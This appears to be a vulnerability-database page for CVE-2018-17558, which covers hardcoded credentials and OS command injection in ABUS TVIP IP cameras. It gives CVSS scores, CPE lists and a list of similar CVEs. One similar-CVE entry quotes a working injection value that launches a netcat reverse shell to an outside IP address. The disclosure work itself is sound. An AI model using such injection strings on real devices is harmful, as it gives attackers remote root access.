Logo
-

Byte Open Security

(ByteOS Network)

Log In

Sign Up

ByteOS

Security
Vulnerability Details
Registries
Custom Views
Weaknesses
Attack Patterns
Filters & Tools
Vulnerability Details :

CVE-2018-17558

Summary
Assigner-mitre
Assigner Org ID-8254265b-2729-46b6-b9e3-3dfca2d5bfca
Published At-26 Oct, 2023 | 00:00
Updated At-11 Sep, 2024 | 19:29
Rejected At-
Credits

Hardcoded manufacturer credentials and an OS command injection vulnerability in the /cgi-bin/mft/ directory on ABUS TVIP TVIP20050 LM.1.6.18, TVIP10051 LM.1.6.18, TVIP11050 MG.1.6.03.05, TVIP20550 LM.1.6.18, TVIP10050 LM.1.6.18, TVIP11550 MG.1.6.03, TVIP21050 MG.1.6.03, and TVIP51550 MG.1.6.03 cameras allow remote attackers to execute code as root.

Vendors
-
Not available
Products
-
Metrics (CVSS)
VersionBase scoreBase severityVector
Weaknesses
Attack Patterns
Solution/Workaround
References
HyperlinkResource Type
EPSS History
Score
Latest Score
-
N/A
No data available for selected date range
Percentile
Latest Percentile
-
N/A
No data available for selected date range
Stakeholder-Specific Vulnerability Categorization (SSVC)
â–ĽCommon Vulnerabilities and Exposures (CVE)
cve.org
Assigner:mitre
Assigner Org ID:8254265b-2729-46b6-b9e3-3dfca2d5bfca
Published At:26 Oct, 2023 | 00:00
Updated At:11 Sep, 2024 | 19:29
Rejected At:
â–ĽCVE Numbering Authority (CNA)

Hardcoded manufacturer credentials and an OS command injection vulnerability in the /cgi-bin/mft/ directory on ABUS TVIP TVIP20050 LM.1.6.18, TVIP10051 LM.1.6.18, TVIP11050 MG.1.6.03.05, TVIP20550 LM.1.6.18, TVIP10050 LM.1.6.18, TVIP11550 MG.1.6.03, TVIP21050 MG.1.6.03, and TVIP51550 MG.1.6.03 cameras allow remote attackers to execute code as root.

Affected Products
Vendor
n/a
Product
n/a
Versions
Affected
  • n/a
Problem Types
TypeCWE IDDescription
textN/An/a
Type: text
CWE ID: N/A
Description: n/a
Metrics
VersionBase scoreBase severityVector
Metrics Other Info
Impacts
CAPEC IDDescription
Solutions

Configurations

Workarounds

Exploits

Credits

Timeline
EventDate
Replaced By

Rejected Reason

References
HyperlinkResource
https://sec.maride.cc/posts/abus/
N/A
https://www.ccc.de/en/updates/2019/update-nicht-verfugbar-hersteller-nicht-zu-erreichen
N/A
Hyperlink: https://sec.maride.cc/posts/abus/
Resource: N/A
Hyperlink: https://www.ccc.de/en/updates/2019/update-nicht-verfugbar-hersteller-nicht-zu-erreichen
Resource: N/A
â–ĽAuthorized Data Publishers (ADP)
1. CVE Program Container
Affected Products
Metrics
VersionBase scoreBase severityVector
Metrics Other Info
Impacts
CAPEC IDDescription
Solutions

Configurations

Workarounds

Exploits

Credits

Timeline
EventDate
Replaced By

Rejected Reason

References
HyperlinkResource
https://sec.maride.cc/posts/abus/
x_transferred
https://www.ccc.de/en/updates/2019/update-nicht-verfugbar-hersteller-nicht-zu-erreichen
x_transferred
Hyperlink: https://sec.maride.cc/posts/abus/
Resource:
x_transferred
Hyperlink: https://www.ccc.de/en/updates/2019/update-nicht-verfugbar-hersteller-nicht-zu-erreichen
Resource:
x_transferred
2. CISA ADP Vulnrichment
Affected Products
Vendor
abus
Product
tvip_72500_firmware
CPEs
  • cpe:2.3:o:abus:tvip_10000_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_10001_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_10005a_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_10005b_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_10005_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_10050_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_10051_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_10055a_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_10055b_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_10500_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_10550_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_11000_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_11050_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_11500_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_11501_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_11502_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_11550_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_11551_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_11552_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_20000_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_20050_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_20500_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_20550_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_21000_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_21050_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_21500_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_21501_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_21502_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_21550_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_21551_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_21552_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_22500_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_31000_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_31001_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_31050_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_31500_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_31501_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_31550_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_31551_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_32500_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_51500_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_51550_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_71500_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_71501_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_71550_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_71551_firmware:-:*:*:*:*:*:*:*
  • cpe:2.3:o:abus:tvip_72500_firmware:-:*:*:*:*:*:*:*
Default Status
unknown
Versions
Affected
  • From 0 before * (custom)
Problem Types
TypeCWE IDDescription
CWECWE-78CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Type: CWE
CWE ID: CWE-78
Description: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Metrics
VersionBase scoreBase severityVector
3.19.8CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Version: 3.1
Base score: 9.8
Base severity: CRITICAL
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Metrics Other Info
Impacts
CAPEC IDDescription
Solutions

Configurations

Workarounds

Exploits

Credits

Timeline
EventDate
Replaced By

Rejected Reason

References
HyperlinkResource
Information is not available yet
â–ĽNational Vulnerability Database (NVD)
nvd.nist.gov
Source:cve@mitre.org
Published At:26 Oct, 2023 | 22:15
Updated At:11 Sep, 2024 | 20:35

Hardcoded manufacturer credentials and an OS command injection vulnerability in the /cgi-bin/mft/ directory on ABUS TVIP TVIP20050 LM.1.6.18, TVIP10051 LM.1.6.18, TVIP11050 MG.1.6.03.05, TVIP20550 LM.1.6.18, TVIP10050 LM.1.6.18, TVIP11550 MG.1.6.03, TVIP21050 MG.1.6.03, and TVIP51550 MG.1.6.03 cameras allow remote attackers to execute code as root.

CISA Catalog
Date AddedDue DateVulnerability NameRequired Action
N/A
Date Added: N/A
Due Date: N/A
Vulnerability Name: N/A
Required Action: N/A
Metrics
TypeVersionBase scoreBase severityVector
Primary3.19.8CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Secondary3.19.8CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Type: Primary
Version: 3.1
Base score: 9.8
Base severity: CRITICAL
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Type: Secondary
Version: 3.1
Base score: 9.8
Base severity: CRITICAL
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CPE Matches

abus
abus
>>tvip_10000_firmware>>-
cpe:2.3:o:abus:tvip_10000_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10000>>-
cpe:2.3:h:abus:tvip_10000:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10001_firmware>>-
cpe:2.3:o:abus:tvip_10001_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10001>>-
cpe:2.3:h:abus:tvip_10001:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10005_firmware>>-
cpe:2.3:o:abus:tvip_10005_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10005>>-
cpe:2.3:h:abus:tvip_10005:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10005a_firmware>>-
cpe:2.3:o:abus:tvip_10005a_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10005a>>-
cpe:2.3:h:abus:tvip_10005a:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10005b_firmware>>-
cpe:2.3:o:abus:tvip_10005b_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10005b>>-
cpe:2.3:h:abus:tvip_10005b:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10050_firmware>>-
cpe:2.3:o:abus:tvip_10050_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10050>>-
cpe:2.3:h:abus:tvip_10050:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10051_firmware>>-
cpe:2.3:o:abus:tvip_10051_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10051>>-
cpe:2.3:h:abus:tvip_10051:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10055a_firmware>>-
cpe:2.3:o:abus:tvip_10055a_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10055a>>-
cpe:2.3:h:abus:tvip_10055a:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10055b_firmware>>-
cpe:2.3:o:abus:tvip_10055b_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10055b>>-
cpe:2.3:h:abus:tvip_10055b:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10500_firmware>>-
cpe:2.3:o:abus:tvip_10500_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10500>>-
cpe:2.3:h:abus:tvip_10500:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10550_firmware>>-
cpe:2.3:o:abus:tvip_10550_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_10550>>-
cpe:2.3:h:abus:tvip_10550:-:*:*:*:*:*:*:*
abus
abus
>>tvip_11000_firmware>>-
cpe:2.3:o:abus:tvip_11000_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_11000>>-
cpe:2.3:h:abus:tvip_11000:-:*:*:*:*:*:*:*
abus
abus
>>tvip_11050_firmware>>-
cpe:2.3:o:abus:tvip_11050_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_11050>>-
cpe:2.3:h:abus:tvip_11050:-:*:*:*:*:*:*:*
abus
abus
>>tvip_11500_firmware>>-
cpe:2.3:o:abus:tvip_11500_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_11500>>-
cpe:2.3:h:abus:tvip_11500:-:*:*:*:*:*:*:*
abus
abus
>>tvip_11501_firmware>>-
cpe:2.3:o:abus:tvip_11501_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_11501>>-
cpe:2.3:h:abus:tvip_11501:-:*:*:*:*:*:*:*
abus
abus
>>tvip_11502_firmware>>-
cpe:2.3:o:abus:tvip_11502_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_11502>>-
cpe:2.3:h:abus:tvip_11502:-:*:*:*:*:*:*:*
abus
abus
>>tvip_11550_firmware>>-
cpe:2.3:o:abus:tvip_11550_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_11550>>-
cpe:2.3:h:abus:tvip_11550:-:*:*:*:*:*:*:*
abus
abus
>>tvip_11551_firmware>>-
cpe:2.3:o:abus:tvip_11551_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_11551>>-
cpe:2.3:h:abus:tvip_11551:-:*:*:*:*:*:*:*
abus
abus
>>tvip_11552_firmware>>-
cpe:2.3:o:abus:tvip_11552_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_11552>>-
cpe:2.3:h:abus:tvip_11552:-:*:*:*:*:*:*:*
abus
abus
>>tvip_20000_firmware>>-
cpe:2.3:o:abus:tvip_20000_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_20000>>-
cpe:2.3:h:abus:tvip_20000:-:*:*:*:*:*:*:*
abus
abus
>>tvip_20050_firmware>>-
cpe:2.3:o:abus:tvip_20050_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_20050>>-
cpe:2.3:h:abus:tvip_20050:-:*:*:*:*:*:*:*
abus
abus
>>tvip_20500_firmware>>-
cpe:2.3:o:abus:tvip_20500_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_20500>>-
cpe:2.3:h:abus:tvip_20500:-:*:*:*:*:*:*:*
abus
abus
>>tvip_20550_firmware>>-
cpe:2.3:o:abus:tvip_20550_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_20550>>-
cpe:2.3:h:abus:tvip_20550:-:*:*:*:*:*:*:*
abus
abus
>>tvip_21000_firmware>>-
cpe:2.3:o:abus:tvip_21000_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_21000>>-
cpe:2.3:h:abus:tvip_21000:-:*:*:*:*:*:*:*
abus
abus
>>tvip_21050_firmware>>-
cpe:2.3:o:abus:tvip_21050_firmware:-:*:*:*:*:*:*:*
abus
abus
>>tvip_21050>>-
cpe:2.3:h:abus:tvip_21050:-:*:*:*:*:*:*:*
Weaknesses
CWE IDTypeSource
CWE-798Primarynvd@nist.gov
CWE-78Secondary134c704f-9b21-4f2e-91b3-4a467353bcc0
CWE ID: CWE-798
Type: Primary
Source: nvd@nist.gov
CWE ID: CWE-78
Type: Secondary
Source: 134c704f-9b21-4f2e-91b3-4a467353bcc0
Evaluator Description

Evaluator Impact

Evaluator Solution

Vendor Statements

References
HyperlinkSourceResource
https://sec.maride.cc/posts/abus/cve@mitre.org
Exploit
Third Party Advisory
https://www.ccc.de/en/updates/2019/update-nicht-verfugbar-hersteller-nicht-zu-erreichencve@mitre.org
Third Party Advisory
Hyperlink: https://sec.maride.cc/posts/abus/
Source: cve@mitre.org
Resource:
Exploit
Third Party Advisory
Hyperlink: https://www.ccc.de/en/updates/2019/update-nicht-verfugbar-hersteller-nicht-zu-erreichen
Source: cve@mitre.org
Resource:
Third Party Advisory

Change History

0
Information is not available yet

Similar CVEs

2074Records found

CVE-2025-34035
Matching Score-4
Assigner-VulnCheck
ShareView Details
Matching Score-4
Assigner-VulnCheck
CVSS Score-10||CRITICAL
EPSS-10.15% / 93.14%
||
7 Day CHG~0.00%
Published-24 Jun, 2025 | 01:00
Updated-07 Apr, 2026 | 14:09
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
EnGenius EnShare IoT Gigabit Cloud Service Command Injection

An OS command injection vulnerability exists in EnGenius EnShare Cloud Service version 1.4.11 and earlier. The usbinteract.cgi script fails to properly sanitize user input passed to the path parameter, allowing unauthenticated remote attackers to inject arbitrary shell commands. The injected commands are executed with root privileges, leading to full system compromise. Exploitation evidence was observed by the Shadowserver Foundation on 2024-12-05 UTC.

Action-Not Available
Vendor-engeniustechEnGenius
Product-esr1750esr350epg5000_firmwareesr300_firmwareesr300esr600esr900_firmwareesr900esr1200_firmwareesr1750_firmwareesr350_firmwareepg5000esr600_firmwareesr1200EnShare IoT Gigabit Cloud Service
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2025-35451
Matching Score-4
Assigner-Cybersecurity and Infrastructure Security Agency (CISA) U.S. Civilian Government
ShareView Details
Matching Score-4
Assigner-Cybersecurity and Infrastructure Security Agency (CISA) U.S. Civilian Government
CVSS Score-9.3||CRITICAL
EPSS-0.17% / 37.45%
||
7 Day CHG~0.00%
Published-05 Sep, 2025 | 17:43
Updated-14 Jan, 2026 | 15:33
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Pan-Tilt-Zoom cameras hard-coded default passwords with SSH and telnet enabled

PTZOptics and possibly other ValueHD-based pan-tilt-zoom cameras use hard-coded, default administrative credentials. The passwords can readily be cracked. Many cameras have SSH or telnet listening on all interfaces. The passwords cannot be changed by the user, nor can the SSH or telnet service be disabled by the user.

Action-Not Available
Vendor-smtavvaluehdmulticam-systemsValueHDSMTAVmultiCAM SystemsPTZOptics
Product-v60xlvx800i2ptvl-zcamba20s_firmwarebx20uhd_firmwarevl_fixed_camera_firmwaremcamii_ptz_firmwarebx20uhd-n_firmwarept20x-ndi-xx_firmwarebv20sbv30spt12x-ndi-xx_firmwarevx60alpt20x-ndi-xxpteptz-ndi-zcam-g2vx60al_firmwareba30s_firmwarev63xlvx90ba12-nvx60asl_firmwareba12svx752a_firmwarevx71uvs_firmwarevx800i2_firmwarevx61baslba20-nvx61basl_firmwarept20x-zcambv30s_firmwarept30x-sdi-xx-g2_firmwareba12-n_firmwarevx630alba12s_firmwarevx751bapt12x-sdi-xx-g2ndi_fixed_camerapt12x-zcampt20x-zcam_firmwarev71uvshd17h-n_firmwarevx61aslpt20x-usb-xx-g2bx20nvx630al_firmwarehd17hv63xl_firmwareba20-n_firmwarept20x-sdi-xx-g2bx20uhd-nv61w_firmwarevx61asl_firmwareba20sbx20n_firmwarept30x-ndi-xxvx752ag_firmwarevx70uvs_firmwarept20x-sdi-xx-g2_firmwarendi_fixed_camera_firmwarept12x-zcam_firmwarev61wpt30x-ndi-xx_firmwarevx70uvsvx752avx720lba30smcamii_ptzvx701ta_firmwarevx752agvl_fixed_camerapt12x-usb-xx-g2_firmwarevx701ra_firmwarepteptz-ndi-zcam-g2_firmwarev71uvs_firmwarept12x-ndi-xxbv20s_firmwarepteptz-zcam-g2bx20uhdbx20s-sh_firmwarebx20s-shvx90_firmwarevx751ba_firmwarept12x-usb-xx-g2ba30-nvx60aslvx71uvsv60xl_firmwarebx30sptvl-zcam_firmwarept20x-usb-xx-g2_firmwarevx61alba30-n_firmwarept12x-sdi-xx-g2_firmwarepteptz-zcam-g2_firmwarevx61al_firmwarevx701rapt30x-sdi-xx-g2vx720l_firmwarehd17h_firmwarevx701tahd17h-nbx30s_firmwarePT30X-4K-xx-G3PT-STUDIOPROPT20X-SDI/NDI-xxPT30X-LINK-4K-xxPT20X-USB-xxPT12X-STUDIO-4K-xx-G3PT12X-SDI/NDI-xxVL Fixed Camera/NDI Fixed CameraHC-EPTZ-NDIPT20X-STUDIO-4K-xx-G3PT12X-USB-xxPT30X-SE-xx-G3PT20X-4K-xx-G3PT20X-SE-xx-G3PT20X-LINK-4K-xxPT30X-SDI/NDI-xx20x Fixed Camera/NDI Fixed CameraEPTZ Fixed Camera/NDI Fixed CameraPan-Tilt-Zoom CamerasPT12X-SE-xx-G312x Fixed Camera/NDI Fixed CameraPT12X-LINK-4K-xxPT12X-4K-xx-G3
CWE ID-CWE-798
Use of Hard-coded Credentials
CVE-2020-36381
Matching Score-4
Assigner-MITRE Corporation
ShareView Details
Matching Score-4
Assigner-MITRE Corporation
CVSS Score-9.8||CRITICAL
EPSS-1.12% / 78.32%
||
7 Day CHG~0.00%
Published-31 Oct, 2021 | 19:51
Updated-04 Aug, 2024 | 17:23
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available

An issue was discovered in the singleCrunch function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.

Action-Not Available
Vendor-aaptjs_projectn/a
Product-aaptjsn/a
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2024-0714
Matching Score-4
Assigner-VulDB
ShareView Details
Matching Score-4
Assigner-VulDB
CVSS Score-6.3||MEDIUM
EPSS-0.96% / 76.61%
||
7 Day CHG~0.00%
Published-19 Jan, 2024 | 14:31
Updated-03 Sep, 2024 | 19:32
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
MiczFlor RPi-Jukebox-RFID HTTP Request userScripts.php os command injection

A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

Action-Not Available
Vendor-sourcefabricMiczFlor
Product-phonieboxRPi-Jukebox-RFID
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2020-37002
Matching Score-4
Assigner-VulnCheck
ShareView Details
Matching Score-4
Assigner-VulnCheck
CVSS Score-8.7||NONE
EPSS-0.55% / 68.08%
||
7 Day CHG~0.00%
Published-29 Jan, 2026 | 14:28
Updated-07 Apr, 2026 | 14:05
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Ajenti 2.1.36 - Remote Code Execution

Ajenti 2.1.36 contains an authentication bypass vulnerability that allows remote attackers to execute arbitrary commands after successful login. Attackers can leverage the /api/terminal/create endpoint to send a netcat reverse shell payload targeting a specified IP and port.

Action-Not Available
Vendor-Ajenti Project
Product-Ajenti
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2025-34223
Matching Score-4
Assigner-VulnCheck
ShareView Details
Matching Score-4
Assigner-VulnCheck
CVSS Score-10||CRITICAL
EPSS-2.47% / 85.34%
||
7 Day CHG-0.85%
Published-29 Sep, 2025 | 20:38
Updated-17 Nov, 2025 | 23:56
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Vasion Print (formerly PrinterLogic) Insecure Installation Credentials

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 22.0.1049 and Application prior to version 20.0.2786 (VA/SaaS deployments) contain a default admin account and an installation‑time endpoint at `/admin/query/update_database.php` that can be accessed without authentication. An attacker who can reach the installation web interface can POST arbitrary `root_user` and `root_password` values, causing the script to replace the default admin credentials with attacker‑controlled ones. The script also contains hard‑coded SHA‑512 and SHA‑1 hashes of the default password, allowing the attacker to bypass password‑policy validation. As a result, an unauthenticated remote attacker can obtain full administrative control of the system during the initial setup. This vulnerability has been identified by the vendor as: V-2024-022 — Insecure Installation Credentials.

Action-Not Available
Vendor-vasionVasion
Product-virtual_appliance_applicationvirtual_appliance_hostPrint Virtual Appliance HostPrint Application
CWE ID-CWE-306
Missing Authentication for Critical Function
CWE ID-CWE-798
Use of Hard-coded Credentials
CVE-2025-35452
Matching Score-4
Assigner-Cybersecurity and Infrastructure Security Agency (CISA) U.S. Civilian Government
ShareView Details
Matching Score-4
Assigner-Cybersecurity and Infrastructure Security Agency (CISA) U.S. Civilian Government
CVSS Score-9.2||CRITICAL
EPSS-0.15% / 35.50%
||
7 Day CHG~0.00%
Published-05 Sep, 2025 | 17:49
Updated-23 Dec, 2025 | 17:08
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Pan-Tilt-Zoom cameras default administrative credentials for web interface

PTZOptics and possibly other ValueHD-based pan-tilt-zoom cameras use default, shared credentials for the administrative web interface.

Action-Not Available
Vendor-smtavvaluehdmulticam-systemsValueHDSMTAVmultiCAM SystemsPTZOptics
Product-mcamii_ptz_firmwarehd17h-nvx720lpt12x-ndi-xxpt20x-sdi-xx-g2_firmwarevx751bavx61basl_firmwarevx61alpt20x-usb-xx-g2_firmwareba12s_firmwarevx90vx800i2_firmwarebv20sba30-nvx60alpt30x-sdi-xx-g2ba20-n_firmwareba12-n_firmwarev71uvsvx60aslptvl-zcam_firmwareba30-n_firmwarept12x-4k-xx-g3_firmwarebx20n_firmwarept12x-4k-xx-g3pt30x-se-xx-g3pt20x-zcam_firmwarehd17hvx60asl_firmwarebx20uhd-n_firmwarept12x-se-xx-g3_firmwarept30x-ndi-xx_firmwarebv20s_firmwarept20x-se-xx-g3_firmwarehd17h_firmwarevx61asl_firmwarept30x-4k-xx-g3_firmwarevx71uvs_firmwarevx630al_firmwaremcamii_ptzvx701rapt30x-se-xx-g3_firmwarepteptz-zcam-g2_firmwaret20x-ndi-xx_firmwarevl_fixed_camera_firmwarept20x-zcamv60xl_firmwarept20x-4k-xx-g3vx71uvsba30spt-studiopro_firmwarept12x-usb-xx-g2pt30x-link-4k-xxba20spt30x-ndi-xxv61wvx61baslvx90_firmwarevx701ta_firmwarept20x-usb-xx-g2bv30s_firmwarepteptz-ndi-zcam-g2vx701tavx751ba_firmwaret20x-ndi-xxvx60al_firmwarev63xl_firmwarept12x-se-xx-g3v71uvs_firmwarevx70uvspt30x-4k-xx-g3pt12x-sdi-xx-g2_firmwareptvl-zcamvx752avx800i2vx61al_firmwarev63xlv61w_firmwarept30x-sdi-xx-g2_firmwarept30x-link-4k-xx_firmwarept12x-usb-xx-g2_firmwarept20x-4k-xx-g3_firmwareba20s_firmwarept20x-link-4k-xx_firmwarepteptz-zcam-g2vx752ag_firmwarevx61aslpt12x-link-4k-xx_firmwarebv30spt20x-se-xx-g3pt12x-ndi-xx_firmwarevl_fixed_cameravx70uvs_firmwareba12spt12x-zcam_firmwareba20-nbx20uhd-nvx752a_firmwarebx20s-shvx701ra_firmwarept-studioprondi_fixed_camerabx20s-sh_firmwarev60xlbx20uhdpt20x-sdi-xx-g2pt12x-zcambx30s_firmwarevx752agvx630alpt12x-link-4k-xxbx30sba30s_firmwareba12-nvx720l_firmwarehd17h-n_firmwarebx20uhd_firmwarept12x-sdi-xx-g2ndi_fixed_camera_firmwarebx20npt20x-link-4k-xxPT30X-4K-xx-G3PT-STUDIOPROPT20X-SDI/NDI-xxPT30X-LINK-4K-xxPT20X-USB-xxPT12X-STUDIO-4K-xx-G3PT12X-SDI/NDI-xxVL Fixed Camera/NDI Fixed CameraHC-EPTZ-NDIPT20X-STUDIO-4K-xx-G3PT12X-USB-xxPT30X-SE-xx-G3PT20X-4K-xx-G3PT20X-SE-xx-G3PT20X-LINK-4K-xxPT30X-SDI/NDI-xx20x Fixed Camera/NDI Fixed CameraEPTZ Fixed Camera/NDI Fixed CameraPan-Tilt-Zoom CamerasPT12X-SE-xx-G312x Fixed Camera/NDI Fixed CameraPT12X-LINK-4K-xxPT12X-4K-xx-G3
CWE ID-CWE-1392
Use of Default Credentials
CWE ID-CWE-798
Use of Hard-coded Credentials
CVE-2025-3363
Matching Score-4
Assigner-TWCERT/CC
ShareView Details
Matching Score-4
Assigner-TWCERT/CC
CVSS Score-9.8||CRITICAL
EPSS-1.06% / 77.73%
||
7 Day CHG~0.00%
Published-08 Apr, 2025 | 02:11
Updated-15 Apr, 2026 | 00:35
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
HGiga iSherlock - OS Command Injection

The web service of iSherlock from HGiga has an OS Command Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary OS commands and execute them on the server.

Action-Not Available
Vendor-HGiga
Product-iSherlock 4.5iSherlock 5.5
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2025-3361
Matching Score-4
Assigner-TWCERT/CC
ShareView Details
Matching Score-4
Assigner-TWCERT/CC
CVSS Score-9.8||CRITICAL
EPSS-1.06% / 77.73%
||
7 Day CHG~0.00%
Published-08 Apr, 2025 | 02:00
Updated-15 Apr, 2026 | 00:35
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
HGiga iSherlock - OS Command Injection

The web service of iSherlock from HGiga has an OS Command Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary OS commands and execute them on the server.

Action-Not Available
Vendor-HGiga
Product-iSherlock 4.5iSherlock 5.5
